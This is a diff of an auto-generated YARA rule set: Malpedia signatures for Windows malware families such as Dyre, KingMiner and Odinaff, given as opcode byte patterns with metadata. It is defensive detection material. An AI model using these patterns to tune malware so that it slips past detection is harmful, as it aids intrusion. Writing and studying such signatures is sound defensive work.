-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bart_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kingminer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kingminer_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "b12024871014a9e86ab993e82383bdd8cbf27e2df488611e968a0202264b8904"
+		logic_hash = "a1f2a6dac0d3d841d4f21da5b45b97f1a4e688102fb3e94636b9a33bdb699efe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132564,32 +133156,32 @@ rule MALPEDIA_Win_Bart_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45ff 6a01 50 53 ffd7 8a4632 8845ff }
-		$sequence_1 = { 5f 8be5 5d c3 b8???????? e8???????? 83ec18 }
-		$sequence_2 = { 889d78ffffff 57 8b7d10 84db 0f8ed3020000 0fb6d3 }
-		$sequence_3 = { c3 55 8bec 51 53 8b5d08 8d45ff }
-		$sequence_4 = { 89848e70af0400 4b 75a8 8b45f8 eb56 }
-		$sequence_5 = { 56 e8???????? 8b9d68ffffff 8d45bc 50 8b87b0000000 53 }
-		$sequence_6 = { 8b45e0 59 3945d4 7596 3bde 0f841c020000 }
-		$sequence_7 = { 8d4517 885d17 50 56 ffd7 8b5df4 8d4517 }
-		$sequence_8 = { 56 53 50 6a00 57 }
-		$sequence_9 = { 83f819 0f84ae000000 83ff23 0f84a5000000 83fe23 0f849c000000 83f823 }
+		$sequence_0 = { 6a00 6a00 57 ff15???????? 6a00 57 ff15???????? }
+		$sequence_1 = { 752d 83791000 7514 8b4f3c 8b17 394a38 740a }
+		$sequence_2 = { d1e9 83c002 3bd1 72d1 }
+		$sequence_3 = { 6a00 52 ff15???????? 6a00 ff15???????? a1???????? }
+		$sequence_4 = { 7524 a1???????? a3???????? a1???????? c705????????6d7b0010 }
+		$sequence_5 = { 7406 33c0 5d c21000 e8???????? }
+		$sequence_6 = { 8b4704 8b15???????? 8945fc 8b07 }
+		$sequence_7 = { f3a5 ff249590640010 8bc7 ba03000000 83e904 }
+		$sequence_8 = { 50 ff15???????? 3bc7 7435 8d8de8feffff }
+		$sequence_9 = { 8b95d0feffff 2b4234 7419 83b9a000000000 7466 50 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 165888
 }
-rule MALPEDIA_Win_Grateful_Pos_Auto : FILE
+rule MALPEDIA_Win_Remy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9ee923d9-386a-5d32-9440-a8b85e81712d"
+		id = "9e3d091c-9c3e-5358-821c-2201f723e147"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grateful_pos_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remy_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "ee462fd47d72681e88085a94b5322cb383fccf63de7910d0f50a42105a7d61e3"
+		logic_hash = "75f06668797d3499803b9fa9b8dc61118625be3fbfdaf403e38706d03959bd0b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132603,40 +133195,34 @@ rule MALPEDIA_Win_Grateful_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7407 b8f6ffffff eb02 33c0 }
-		$sequence_1 = { 7411 e8???????? e8???????? 33c0 e9???????? }
-		$sequence_2 = { b8feffffff eb1a b8fdffffff eb13 b8fcffffff }
-		$sequence_3 = { e8???????? 99 b980ee3600 f7f9 }
-		$sequence_4 = { eb07 b8fcffffff eb02 33c0 }
-		$sequence_5 = { 83f801 7510 e8???????? e8???????? }
-		$sequence_6 = { 0f858d000000 833d????????00 745a 6a28 8d9574ffffff }
-		$sequence_7 = { e8???????? 83c40c 8b45fc 8b4d0c 8b510c }
-		$sequence_8 = { e8???????? 83c410 8b85e0fbffff 0385dcfbffff }
-		$sequence_9 = { 83c408 85c0 0f8451010000 c605????????01 c68572f9ffff00 }
-		$sequence_10 = { 8b4dbc 894dcc 8b55d0 8955b4 8b45d0 83e801 }
-		$sequence_11 = { 8bb5f4fffdff 03b5f8fffdff c1ee03 8b4508 8b7810 8b85f4fffdff 0385f8fffdff }
-		$sequence_12 = { 51 c705????????00000000 eb0d a1???????? 83c001 a3???????? 8b4d08 }
-		$sequence_13 = { 888d74fdffff 68ff000000 6a00 8d9575fdffff 52 }
-		$sequence_14 = { 888424c1000000 b801000000 486bc012 488d0df2cb0100 0fbe0401 83f04d }
-		$sequence_15 = { 03d0 69d290010000 3bca 7414 488d3db7b5feff 4963e9 448b94af14690300 }
+		$sequence_0 = { 64a300000000 8b4508 8bf9 8b4d0c 89442428 33c0 }
+		$sequence_1 = { 8b06 8995b8efffff 8b5608 898db0efffff 8d8d38dfffff 8985bcefffff 8995c0efffff }
+		$sequence_2 = { 83791810 8d4104 7202 8b00 8b5120 52 50 }
+		$sequence_3 = { e8???????? c645fc01 8b08 8bb564ffffff 8d41f0 83c6f0 3bc6 }
+		$sequence_4 = { 2bc6 83e808 50 8d8d54ffffff 8d5e08 51 }
+		$sequence_5 = { 8b4b04 4e 833cb100 7517 6a10 e8???????? 83c404 }
+		$sequence_6 = { 8b06 50 83c604 56 8b74244c 56 e8???????? }
+		$sequence_7 = { 8d8d00ffffff 8bd6 e8???????? 83c408 3bc3 8b8500ffffff 0f85ce070000 }
+		$sequence_8 = { 8d4dc8 51 6a08 68ffff0000 56 897dc8 ff15???????? }
+		$sequence_9 = { 8b4210 83c7f0 89642448 89642448 ffd0 395f0c 8d4f0c }
 
 	condition:
-		7 of them and filesize < 3964928
+		7 of them and filesize < 507904
 }
-rule MALPEDIA_Win_Dyre_Auto : FILE
+rule MALPEDIA_Win_Udpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dfd82ad1-18fa-5929-a163-6bbf986e9f0e"
+		id = "98223189-2bfc-52a6-a611-fcd1eca88452"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dyre_auto.yar#L1-L226"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.udpos_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "0632ac932a1fda05bb4d709a552a76b91b864a446705dbf518e55fdb6e3d3885"
+		logic_hash = "7c58f61902609cad456fdc9a279fa1453c4c938ca02ac1221afcfb1b15fb3e59"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132648,45 +133234,32 @@ rule MALPEDIA_Win_Dyre_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800004000 6800000400 ff15???????? a3???????? 85c0 }
-		$sequence_1 = { 83c9ff 2bc8 8bd0 c1fa02 }
-		$sequence_2 = { 85c0 75f2 5d c3 33c0 40 }
-		$sequence_3 = { 0fb6c9 0bca 8a5001 c1e108 0fb6d2 }
-		$sequence_4 = { e8???????? 85c0 74df 33c0 40 5e }
-		$sequence_5 = { 85c0 7502 c9 c3 33c0 837dfc20 }
-		$sequence_6 = { 8b4508 ff7514 53 ff30 e8???????? }
-		$sequence_7 = { 53 8bf8 e8???????? 59 5b 8bc7 5f }
-		$sequence_8 = { 440fb69c249f000000 0fb68c249d000000 0fb694249c000000 440fb694249b000000 }
-		$sequence_9 = { 4433c0 418bc4 418bd3 c1c806 4433c0 8bc5 }
-		$sequence_10 = { 488bc8 ff15???????? 85c0 7455 4c8d442434 }
-		$sequence_11 = { 488bcb e8???????? 4c8d5e01 41b8f7ffffff 6666660f1f840000000000 488bcf }
-		$sequence_12 = { 663907 7530 8b4604 394704 7528 8b4608 394708 }
-		$sequence_13 = { 410fb649fe c1e208 440bc2 41c1e008 410bc8 49ffca 43894c0bd3 }
-		$sequence_14 = { 4433c0 418bc4 4123c5 33c8 8bc3 4403c1 418bcb }
-		$sequence_15 = { 410fb649ff 410fb611 450fb64101 c1e108 }
-		$sequence_16 = { 668b1401 668910 83c002 4e }
-		$sequence_17 = { 90 ff15???????? 8a0437 8806 46 4b }
-		$sequence_18 = { ff15???????? 8bf0 8d85d4fdffff 50 }
-		$sequence_19 = { 833d????????00 751b 6a00 6800004000 }
-		$sequence_20 = { a1???????? 6a08 50 ff15???????? 8bd8 }
-		$sequence_21 = { 8bf1 85db 7416 57 8bfa }
-		$sequence_22 = { 57 8bfa 2bfe 90 ff15???????? }
+		$sequence_0 = { 7410 8b0d???????? 8d95c4fbffff 52 51 ffd0 }
+		$sequence_1 = { 6a00 6a01 6800000040 8d8d1cefffff 51 }
+		$sequence_2 = { 83c404 684c040000 ff15???????? 83bd9cfefffff5 0f8fbafcffff 833d????????0a 5f }
+		$sequence_3 = { ffd6 8d955cffffff 52 8d85e0f8ffff 50 ffd6 }
+		$sequence_4 = { 68???????? 8d85e0f8ffff 50 ffd6 8b8d10efffff 51 }
+		$sequence_5 = { 3bc6 7e15 85c0 7e11 }
+		$sequence_6 = { ffd6 8b0d???????? 51 68???????? ffd6 }
+		$sequence_7 = { ffd6 8d85bcfeffff 50 8d8de0f8ffff 51 ffd6 8d957cf8ffff }
+		$sequence_8 = { c20400 e8???????? 5d c20400 a1???????? 8b5020 33c9 }
+		$sequence_9 = { 83e60f 0fb65c35e8 0fb671fd 8858fd }
 
 	condition:
-		7 of them and filesize < 590848
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Portstarter_Auto : FILE
+rule MALPEDIA_Win_Odinaff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87b6322a-7ef6-5bd0-bab4-2d7f3526e302"
+		id = "91e538b8-49fb-59bb-b141-8774c9ea7c3a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portstarter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.portstarter_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.odinaff_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "370c6c0b9e8b4d5e29811c239d93b7467412e95f00ce8f657934e0617f7c9264"
+		logic_hash = "30f018bdaf01e341e417353febba3580b7f1e98a76ca0b650eefbf84ad5901ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132700,34 +133273,34 @@ rule MALPEDIA_Win_Portstarter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b902000000 e8???????? 4889842410010000 48899c2488000000 e8???????? 4889842448010000 48899c24c0000000 }
-		$sequence_1 = { 90 488d05815c2800 90 e8???????? 488d152cd53000 488910 833d????????00 }
-		$sequence_2 = { 90 48b9887721425d7dfd56 48898c248c000000 c7842494000000fdea6423 0fb68c2491000000 884c2467 0fb6942490000000 }
-		$sequence_3 = { c3 0fb69404e8010000 0fb6bc04b8010000 29d7 4088bc04b8010000 48ffc0 6690 }
-		$sequence_4 = { f6c280 0f84b5000000 48895c2448 4889742450 488d05341c1800 e8???????? 4889442478 }
-		$sequence_5 = { 90 eb11 488d7818 488bb42460020000 e8???????? 4889c3 488d05bb372e00 }
-		$sequence_6 = { 66898424e8000000 e8???????? 48898424d0000000 48895c2448 0fb78c24e8000000 0fb7c9 4889c8 }
-		$sequence_7 = { e8???????? 488b942428010000 48899048030000 833d????????00 90 7520 488b942410030000 }
-		$sequence_8 = { e8???????? 488d8424d8000000 488b9c2430020000 0f1f4000 e8???????? 488d8424d8000000 488b9c2418020000 }
-		$sequence_9 = { bb00001000 e8???????? 4c89c0 4889d9 e8???????? 4889da bb00001000 }
+		$sequence_0 = { 56 ff15???????? 837dfc00 b801000000 7503 8b45e4 }
+		$sequence_1 = { 8b45f8 83c410 85c0 7408 50 6a00 }
+		$sequence_2 = { 8d55f0 52 ff15???????? 85c0 0f84ea000000 8b45ec }
+		$sequence_3 = { c7458044000000 ff15???????? 8b4dfc 53 68???????? 51 ff15???????? }
+		$sequence_4 = { 50 c745e400000000 ff15???????? 8b35???????? 8d7808 57 6a08 }
+		$sequence_5 = { 668910 8b55f4 8d4df0 51 52 6a02 c745f000080000 }
+		$sequence_6 = { 51 52 52 6a20 6a01 52 }
+		$sequence_7 = { 6808020000 56 6a00 8bf8 }
+		$sequence_8 = { 53 52 8945fc 895de0 }
+		$sequence_9 = { 8b1d???????? 50 ffd3 8b4d10 }
 
 	condition:
-		7 of them and filesize < 14144512
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Darkshell_Auto : FILE
+rule MALPEDIA_Win_Hyperssl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4fc21ee-58fa-538c-be7f-a8cab0c5cdbd"
+		id = "278628e2-0cb8-5fcf-b0b4-758a4cb29c23"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkshell_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hyperssl_auto.yar#L1-L205"
 		license_url = "N/A"
-		logic_hash = "3ad6f3f944b2f63e5ca49ebc403baac1fe005ab1933d4836c8ac4d2304e8086f"
+		logic_hash = "11f6d7199b100b059f11030323327bd2335a327a45ce3c310d198ef4e514bf67"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132739,32 +133312,45 @@ rule MALPEDIA_Win_Darkshell_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 c744246044000000 ff15???????? 8be8 85ed 0f8494000000 }
-		$sequence_1 = { 8b542424 41 25ff0f0000 894c2410 8b0e 03c1 }
-		$sequence_2 = { 8944240c 8d4c240c 89442410 51 89442418 52 50 }
-		$sequence_3 = { 6681384d5a 7543 8b483c 03c1 813850450000 7536 8b4c2408 }
-		$sequence_4 = { 5e 5b 8bc5 5f 5d 83c474 }
-		$sequence_5 = { c20400 8b15???????? 68???????? 52 c705????????01000000 ffd6 }
-		$sequence_6 = { d1ea 3bda 7286 8b4604 }
-		$sequence_7 = { 25ff000000 56 99 f7f9 8b74240c }
-		$sequence_8 = { 8b4c2414 52 8b542428 50 51 52 }
-		$sequence_9 = { 8b5008 33c0 8bfa f2ae }
+		$sequence_0 = { 0108 3310 c1c607 c1c210 }
+		$sequence_1 = { 8b4028 03c1 7423 56 57 b9???????? }
+		$sequence_2 = { 0105???????? 8d558c 89458c 894590 }
+		$sequence_3 = { 33c9 2402 3c02 0f94c1 8d0ccd05000000 8d040f 50 }
+		$sequence_4 = { 0101 0100 0100 0100 }
+		$sequence_5 = { 0100 0200 0200 0002 0002 }
+		$sequence_6 = { 0108 3908 1bc9 f7d9 }
+		$sequence_7 = { 0101 014514 2bf3 8b5d0c }
+		$sequence_8 = { 0105???????? 8d8d5cffffff 89855cffffff 898560ffffff }
+		$sequence_9 = { 5f 8a10 301401 8a10 }
+		$sequence_10 = { 8a10 301406 40 4f 75f2 }
+		$sequence_11 = { 2bc8 2bf0 5f 8a10 }
+		$sequence_12 = { 40 5d c20c00 6a08 68???????? }
+		$sequence_13 = { 8bc8 85c9 7436 8b413c 03c1 }
+		$sequence_14 = { 03c1 742a 8b4028 03c1 }
+		$sequence_15 = { 011d???????? 5f 8935???????? 5e }
+		$sequence_16 = { 017e08 50 e8???????? ff0d???????? }
+		$sequence_17 = { 017e0c 5f 8bc6 5e c20800 }
+		$sequence_18 = { 017e08 8bc3 e8???????? c20400 }
+		$sequence_19 = { 017e0c 8d4d08 e8???????? 5f }
+		$sequence_20 = { 01442428 8b442428 884500 45 }
+		$sequence_21 = { 017e0c 395e10 740f ff7610 }
+		$sequence_22 = { 016b08 897b04 5f 5e }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 835584
 }
-rule MALPEDIA_Win_Floki_Bot_Auto : FILE
+rule MALPEDIA_Win_Open_Carrot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25c81d04-9abf-5940-8e55-7e5abeb99153"
+		id = "f072a642-4447-5973-9ead-dc9232cd5b85"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.floki_bot_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.open_carrot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.open_carrot_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e2f9df61c4df036b71f6882cf4c35419384506db07aa4de7d79fcad14d6710ad"
+		logic_hash = "28ad822413b17834bf69734ab09ffa4d02ddba5c7af7590650f7bb3e1133ed6c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132778,32 +133364,32 @@ rule MALPEDIA_Win_Floki_Bot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fe45ff 8a45ff 3a45fc 7285 fe45fe 8a45fe 3a4601 }
-		$sequence_1 = { 8bc6 8d74241c e8???????? 84c0 0f843f010000 8b442414 }
-		$sequence_2 = { 53 57 8bf8 8d45f8 50 33db }
-		$sequence_3 = { 8b4c2414 0fb713 83fa04 7516 663911 7507 8b4d10 }
-		$sequence_4 = { 50 53 ff35???????? 682d010000 e8???????? 83c418 }
-		$sequence_5 = { 50 e8???????? ff471c 015f14 8bc6 8b55fc e8???????? }
-		$sequence_6 = { bf???????? e8???????? ff75f0 84c0 7407 e8???????? eb08 }
-		$sequence_7 = { 8d45f4 50 e8???????? 6a09 6a00 8d45f4 50 }
-		$sequence_8 = { 744d 66391f 7448 8d4c2440 e8???????? 6a04 8d544444 }
-		$sequence_9 = { 84c0 744b 8b45f8 85c0 7414 ff75ec e8???????? }
+		$sequence_0 = { 83bb90af010000 8b0f 7430 488b93a0af0100 4c8bc7 488b0b ff5318 }
+		$sequence_1 = { 4d8b2424 4c21e6 4c01f7 4881e104000000 4889e8 48056f000000 4c01c1 }
+		$sequence_2 = { 488bc8 e8???????? 488bf8 4885c0 7533 4c8d0d3b5d0600 c7442420c7000000 }
+		$sequence_3 = { ff15???????? 807da02d 7518 807da12d 7512 e8???????? 84c0 }
+		$sequence_4 = { 412b5500 4d89d8 4889f6 482580000000 81ea027cee51 4981c840000000 48253f000000 }
+		$sequence_5 = { 8133eaa23d55 4889eb 49c7c500000000 4881c36f000000 48c7c000020000 66290b 4981c3ffff0000 }
+		$sequence_6 = { 7525 4c8d0d92101000 c744242096010000 ba9d000000 8d4822 448d4041 e8???????? }
+		$sequence_7 = { 488bd8 4885c0 7520 4c8d0da8081000 c7442420dc000000 ba8d000000 448d400d }
+		$sequence_8 = { 896808 4889680c e8???????? 33d2 4889430c 41b804010000 488bc8 }
+		$sequence_9 = { e8???????? 85c0 0f8551010000 488d4db3 e8???????? 85c0 0f852b010000 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 8377344
 }
-rule MALPEDIA_Win_Daserf_Auto : FILE
+rule MALPEDIA_Win_Scout_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a6f15599-4f13-54ba-bcec-a3b5030d8753"
+		id = "badacd81-959a-5316-bd3b-4267a7a059cc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.daserf_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scout"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scout_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "1bad6c4b5752fd8c6fe15d5fabea81e1efa1678a4e2b8ef0d9b688e6637ca84b"
+		logic_hash = "45093eb9e440370fa3e5ca64b63b1022aa2768448d9bb6e9d805f1e4a716e0bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132817,38 +133403,32 @@ rule MALPEDIA_Win_Daserf_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81c328a25d5a 0545c9ac22 05c26febe9 81c3417cc57d 2dcb488290 81c31b4b740f }
-		$sequence_1 = { f7d2 f7d2 33c0 93 899c2440f3ffff 8bd8 }
-		$sequence_2 = { 2d5f36eba3 05b4cb7144 81c347f7f911 05cae31a61 81eb415d0bcb 05c5fc7980 }
-		$sequence_3 = { 81c3747ffb87 055952dc58 2d0b346d09 056fb8227f 81ebd0466de5 }
-		$sequence_4 = { 6a32 8d36 68???????? 8d12 ff75f8 90 }
-		$sequence_5 = { 81c313bc171f 81c34b9369e2 81c3eb64e095 055b137a14 81eb119d1f79 }
-		$sequence_6 = { ffd7 83c40c 8d8594fcffff 50 }
-		$sequence_7 = { ff35???????? 7500 56 7500 ffd7 }
-		$sequence_8 = { 8b842400f1ffff 81eb1705fc0c 90 0545b15a4c 90 2d9acaaf65 }
-		$sequence_9 = { 81c3ab7990c3 05cb3760e1 81c397e4ecdc 81c3e75ff275 05fbaa91ae 81eb5851999b }
-		$sequence_10 = { 05f1ad59f9 90 81eb704d8e1f 90 81c37208ee7c f7d1 }
-		$sequence_11 = { f7d2 f7d2 81c31bdfefc0 7500 81eb5daf8042 }
-		$sequence_12 = { 05a9b31bec 81c3d6659b48 81eb3e24cc02 05bb9b4196 81eb944686e1 81eb84d90d01 }
-		$sequence_13 = { ffd7 90 ff75fc 8d36 }
-		$sequence_14 = { 83f8ff 894508 0f8405020000 8b8594fdffff 8b3d???????? 83e010 }
-		$sequence_15 = { 81eb31750679 8d36 81c30378b463 f7d6 f7d6 }
+		$sequence_0 = { 57 4883ec20 488bd9 488d3d5cd1feff 488bcf e8???????? 85c0 }
+		$sequence_1 = { ff15???????? 488d0d80960100 eb0c 83f901 }
+		$sequence_2 = { 488d050ef70000 4a8b04e8 42385cf838 0f8df5000000 e8???????? }
+		$sequence_3 = { 488bd9 4c8d0d38c00000 b91c000000 4c8d0528c00000 488d1525c00000 e8???????? 4885c0 }
+		$sequence_4 = { 85c0 7410 488d0d98ca0100 4883c428 e9???????? e8???????? }
+		$sequence_5 = { c745d41398db1a c745d862452312 c745dca8837182 0f1045d0 c744242801000000 }
+		$sequence_6 = { 418ac7 84c0 0f8408010000 8b4c2448 488d15d214ffff 2b4c244c }
+		$sequence_7 = { b84d5a0000 663905c5ccffff 7578 48630df8ccffff 488d15b5ccffff 4803ca 813950450000 }
+		$sequence_8 = { 4883f80e 7773 8b8486bc010100 4803c6 ffe0 }
+		$sequence_9 = { e8???????? 48391d???????? 7505 83c8ff eb75 488beb 488d35634f0100 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 315392
 }
-rule MALPEDIA_Win_Selfmake_Auto : FILE
+rule MALPEDIA_Win_Unidentified_106_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15836b07-3544-5bf9-b844-02538b3af65c"
+		id = "8675f46d-f715-517e-bc85-af94d8443ca1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.selfmake_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_106_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "93ed4fceea8c314a1c4a918011ab44630046aab19d1594880ab759bf63042ba9"
+		logic_hash = "8b889ebf850fd39b916ba5548e2ee462a29668a970da164f9df6605604203541"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132862,32 +133442,32 @@ rule MALPEDIA_Win_Selfmake_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b17 8b4208 8bcf ffd0 33c9 8844241b c74424540f000000 }
-		$sequence_1 = { 99 83e203 03c2 46 c1f802 83c104 3bf0 }
-		$sequence_2 = { 89442439 8944243d 89442441 89442445 6689442449 }
-		$sequence_3 = { 8b542414 8a02 8b5c246c 8bf3 3c7f }
-		$sequence_4 = { 8d342f 83f804 7214 8b16 3b11 }
-		$sequence_5 = { 68???????? e8???????? 83c040 50 e8???????? 83c408 e8???????? }
-		$sequence_6 = { 8b5608 8b4254 8b4e14 8b561c 50 51 52 }
-		$sequence_7 = { 8b442450 7304 8d442450 8b550c }
-		$sequence_8 = { 8a4c1001 884dec 8b55ec 81e2ff000000 83e207 83fa05 }
-		$sequence_9 = { 51 50 e8???????? 8bf8 8a4500 }
+		$sequence_0 = { e8???????? 33c0 eb2a bdfdffffff 4d85e4 741e 4585ed }
+		$sequence_1 = { f7d7 4881ffb057c96e 410fbff0 48bffd4d2301f6224375 488b7c2428 488b3f ff742408 }
+		$sequence_2 = { c3 44886814 4c8d842480000000 8d4701 b20d 488bcb 6689842480000000 }
+		$sequence_3 = { 8bc1 c1e810 884201 8bc1 c1e808 884202 c6020b }
+		$sequence_4 = { e8???????? 448bf0 85c0 7410 488bcb e8???????? 418bc6 }
+		$sequence_5 = { f20f59f1 f20f587330 0f28c6 f20f5c4328 660f2f4320 7612 4c8b4318 }
+		$sequence_6 = { befdffffff e9???????? 4c8b642448 befeffffff 4c8b6c2428 e9???????? 4c8b642448 }
+		$sequence_7 = { 498bcf e8???????? 85c0 0f8ef1000000 48837f5000 8b442434 894710 }
+		$sequence_8 = { 48ffca 66c1e908 6685c9 75e3 418bf6 ff07 488b9c2428010000 }
+		$sequence_9 = { e8???????? 488b9ed8000000 49c7c4ffffffff 44897d48 4c8be8 44897d50 4d8bf4 }
 
 	condition:
-		7 of them and filesize < 932864
+		7 of them and filesize < 27402240
 }
-rule MALPEDIA_Win_Mrdec_Auto : FILE
+rule MALPEDIA_Win_Calmthorn_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9c58a6c5-fccf-57f8-a955-f9f71c01cd0e"
+		id = "bcd75189-0c11-5940-85d3-d76aaafb784a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mrdec"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mrdec_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.calmthorn"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.calmthorn_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3ee02aa9dfb3f27619d5f97eac66eb46db9b305219d25b4c3e7969b99a315a5e"
+		logic_hash = "b3539324ecfb8790060aa38a018df9861445823951558eb7601785d0fde93a58"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132901,34 +133481,34 @@ rule MALPEDIA_Win_Mrdec_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bf0 8945fc ff7508 56 e8???????? 56 }
-		$sequence_1 = { e8???????? 85c0 7431 c745ec01000000 837d0c01 7509 }
-		$sequence_2 = { e8???????? 83f8ff 7526 8b4508 8bc8 }
-		$sequence_3 = { e9???????? 8dbdd4fdffff 57 68???????? }
-		$sequence_4 = { e8???????? 56 e8???????? c64446fa00 57 }
